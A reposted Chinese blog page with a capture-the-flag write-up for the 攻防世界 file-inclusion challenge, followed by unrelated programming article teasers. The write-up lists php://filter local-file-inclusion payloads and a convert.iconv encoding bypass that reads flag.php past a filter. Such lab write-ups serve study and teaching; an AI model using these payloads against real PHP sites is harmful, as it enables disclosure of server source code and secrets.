【攻防世界】题目名称-文件包含

【攻防世界】题目名称-文件包含

news/2024/10/6 8:32:56/文章来源:https://blog.csdn.net/wangzhemvp/article/details/137551369

看到 include()，想到文件包含，用php伪协议。

知识点

看到 include()，require()，include_once()，require_once() ，想到文件包含，用php伪协议

?filename=php://filter/read=convert.base64-encode/resource=

?filename=php://filter/read=convert.base64-encode/resource=flag.php

一直显示 do not hack! ，可能是 include("./check.php") 过滤了

依次尝试如下payload，还是提示 do not hack
php://filter/convert.base64-encode/resource=flag.php
php://filter/convert.quoted-printable-encode/resource=flag.php
php://filter/string.rot13/resource=flag.php
php://filter/string.toupper/resource=flag.php
php://filter/string.tolower/resource=flag.php
php://filter/string.strip_tags/resource=flag.php

知识点

convert.iconv.[ ]过滤器：

使用有两种方法:
convert.iconv.<input-encoding>.<output-encoding>
convert.iconv.<input-encoding>/<output-encoding>

用bp爆破一下。要一个一个的试

找到输出编码，再找输入编码

/?filename=php://filter/convert.iconv.UTF-7.UCS-4*/resource=flag.php

或者

/?filename=php://filter/convert.iconv.SJIS*.UCS-4*/resource=flag.php

通过本道题，你要知道：

（1）php://filter 其他编码方式。

（2）convert.iconv. 要一个一个的破解。

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.rhkb.cn/news/307916.html

如若内容造成侵权/违法违规/事实不符，请联系长河编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

zabbix监控配置(添加主机、主机组和添加监控项等)

zabbix监控配置(添加主机、主机组和添加监控项等)

zabbix监控配置文章目录 zabbix监控配置1.添加主机组2.添加主机（linux）3.添加主机（windows）4.监控项配置（通过模板添加）5.监控项配置（手动添加） 1.添加主机组 2.添加主机&#xff0…

阅读更多...

【C语言】字符串函数和内存函数及其模拟实现

【C语言】字符串函数和内存函数及其模拟实现

文章目录前言一、常见字符串库函数1.strlen函数2.长度不受限制的字符串函数2.1 strcpy2.2 strcat2.3 strcmp 3.长度受限制的字符串函数3.1 strncpy3.2 strncat3.3 strncmp 二、字符串查找函数strstrstrtok 三、strerror函数四、内存操作函数1.memcpy2.memmove3.memcmp 五、字…

阅读更多...

水经微图IOS版5.2.0发布

水经微图IOS版5.2.0发布

随时随地，微图一下！ 水经微图（简称“微图”）IOS新版已上线。在该版本中主要新增图层树节点排序功能、常规（矩形、圆、椭圆、扇形）绘制功能、地形夸张等主要功能。当前版本当前版本号为：5…

阅读更多...

$蓝桥杯第2152题——红绿灯$

蓝桥杯第2152题——红绿灯

问题描述爱丽丝要开车去上班, 上班的路上有许多红绿灯, 这让爱丽丝很难过。为了上班不迟到, 她给自己的车安装了氮气喷射装置。现在她想知道自己上班最短需要多少时间。爱丽丝的车最高速度是米每秒, 并且经过改装后, 可以瞬间加速到小于等于最高速的任意速度, 也可以瞵…

阅读更多...

js可视化爬取数据生成当前热点词汇图

js可视化爬取数据生成当前热点词汇图

功能可以爬取到很多数据，并且生成当前的热点词汇图，词越大越热门（词云图） 这里以b站某个评论区的数据为例，爬取63448条数据生成这样的图片让我们能够更加直观的看到当前的热点 git地址可以直接使用，中文…

阅读更多...

【C++】类和对象②（类的默认成员函数：构造函数 | 析构函数）

【C++】类和对象②（类的默认成员函数：构造函数 | 析构函数）

🔥个人主页：Forcible Bug Maker 🔥专栏：C 目录前言类的6个默认成员函数构造函数概念构造函数的特性及用法析构函数概念析构函数的特性及用法结语前言本篇主要内容：类的6个默认成员函数中的构造函…

阅读更多...

mysql四种引擎区别

mysql四种引擎区别

MySQL 提供了多种不同的数据库引擎，其中最常见的有 MyISAM、InnoDB、MEMORY 和 BLACKHOLE。这四个引擎分别有以下特点： 1. MyISAM MyISAM 是 MySQL 的默认引擎。它对于只有较少的修改、大量读取的应用场景具有良好的性能。它不支持事务处理，也…

阅读更多...

算法第四十一天-排除排序链表中的重复元素Ⅱ

算法第四十一天-排除排序链表中的重复元素Ⅱ

排除排序链表中的重复元素Ⅱ 题目要求解题思路题意：在一个有序链表中，如果一个节点的值出现不止一次，那么把这个节点删除掉重点：有序链表，所以，一个节点的值出现不止一次，那么他们必相邻。…

阅读更多...

LeetCode-416. 分割等和子集【数组动态规划】

LeetCode-416. 分割等和子集【数组动态规划】

LeetCode-416. 分割等和子集【数组动态规划】题目描述：解题思路一：01背包问题，动规五部曲解题思路二：0解题思路三：0 题目描述： 给你一个只包含正整数的非空数组 nums 。请你判断是否可以将这个数组分…

阅读更多...

【UE 委托】如何利用函数指针理解委托的基本原理

【UE 委托】如何利用函数指针理解委托的基本原理

目录 0 引言1 函数指针模拟多播委托 🙋‍♂️ 作者：海码007📜 专栏：UE虚幻引擎专栏💥 标题：【UE 委托】如何利用函数指针理解委托的基本原理❣️ 寄语：书到用时方恨少，事非经过不知难…

阅读更多...

OpenCV C++学习笔记

OpenCV C++学习笔记

1.图像的读取与显示 1.1 加载并显示一张图片 #include<opencv2/opencv.hpp> #include<iostream>using namespace cv; using namespace std; int main(int argc,char** argv){Mat srcimread("sonar.jpg");//读取图像if(src.empty()){printf("Could…

阅读更多...

ORA-00600: internal error code, arguments: [krbcbp_9]

ORA-00600: internal error code, arguments: [krbcbp_9]

解决方案 1、清理过期 2、control_file_record_keep_time 修改恢复时间窗口 RMAN (Recovery Manager) 是 Oracle 数据库的备份和恢复工具。在 RMAN 中，可以使用“恢复窗口”的概念来指定数据库可以恢复到的时间点。这个时间点是基于最近的完整备份或增量备份。 …

阅读更多...

创建一个qt登录界面，密码账号正确转到窗口2，否则弹出对话框提示账号密码错误，窗口2有四个按键，三个按键可以朗读按键文本，第四个退出。

创建一个qt登录界面，密码账号正确转到窗口2，否则弹出对话框提示账号密码错误，窗口2有四个按键，三个按键可以朗读按键文本，第四个退出。

作业要求： 主函数： int main(int argc, char *argv[]) {QApplication a(argc, argv);Widget w;w.show();Form1 f;//连接窗口1的信号函数和窗口2打开的lambda函数Widget::connect(&w,&Widget::login,[&](){f.show();});return a.exec(); }窗…

阅读更多...

leetcode73 矩阵置零

leetcode73 矩阵置零

题目描述给定一个 m x n 的矩阵，如果一个元素为 0 ，则将其所在行和列的所有元素都设为 0 。请使用原地算法。输入：matrix [[1,1,1],[1,0,1],[1,1,1]] 输出：[[1,0,1],[0,0,0],[1,0,1]] 输入：matrix [[0,1,2,0],[3,4…

阅读更多...

力扣 |142. 环形链表 II

力扣 |142. 环形链表 II

用快慢指针的方法根据推出的表达式：slow和fast相遇的时候，让slow和位于头节点的p同时向前走，刚好在入环的节点处相遇！注意：b和c交界的点不一定是从例如-4这个节点处， 可能是0节点处。因为相遇的点只能是…

阅读更多...

pycharm2024关闭项目后一直显示正在关闭项目

pycharm2024关闭项目后一直显示正在关闭项目

网上的很多教程都试了不行，直接用下面的方法有效解决。点击帮助--查找操作--输入Registry--点注册表，取消ide.await.scope.completion后的勾选即可。

阅读更多...

（Oracle）SQL优化案例：隐式转换优化

（Oracle）SQL优化案例：隐式转换优化

项目场景项目现场的某个kettle模型执行非常缓慢，原因在于某个SQL执行效率非常的低。甲方得知此事要求公司赶紧优化，负责该模块的同事对SQL优化并不熟悉。所以作为一个立志成为优秀DBA的ETL工程师，我自告奋勇：不是DBA，…

阅读更多...

最新ChatGPT4.0工具使用教程：GPTs使用，Midjourney绘画，AI换脸，Suno-AI音乐生成大模型一站式系统使用教程

最新ChatGPT4.0工具使用教程：GPTs使用，Midjourney绘画，AI换脸，Suno-AI音乐生成大模型一站式系统使用教程

一、前言 ChatGPT3.5、GPT4.0、相信对大家应该不感到陌生吧？简单来说，GPT-4技术比之前的GPT-3.5相对来说更加智能，会根据用户的要求生成多种内容甚至也可以和用户进行创作交流。然而，GPT-4对普通用户来说都是需要额外付费才可以…

阅读更多...

Docker+Uwsgi+Nginx部署Django项目保姆式教程

Docker+Uwsgi+Nginx部署Django项目保姆式教程

之前，我和大家分享了在docker中使用uwsgi部署django项目的教程。这次，为大家带来的是使用DockerUwsgiNginx部署Django项目。废话不多说，我们开干。步骤1：使用命令创建一个django项目我这里python版本使用的是3.9.x 首先&#…

阅读更多...

千视电子携NDI 6前沿技术，亮相北京CCBN展呈现轻量化媒体解决方案

千视电子携NDI 6前沿技术，亮相北京CCBN展呈现轻量化媒体解决方案

千视携NDI 6技术闪耀2024 CCBN展会，呈现轻量化媒体解决方案 2024年4月24日至26日，北京首钢会展中心将举办第三十届中国国际广播电视网络技术展览会（CCBN2024）。这是中国广播电视行业的一项重要盛会，将有国内外超600家…

阅读更多...

最新文章

推荐文章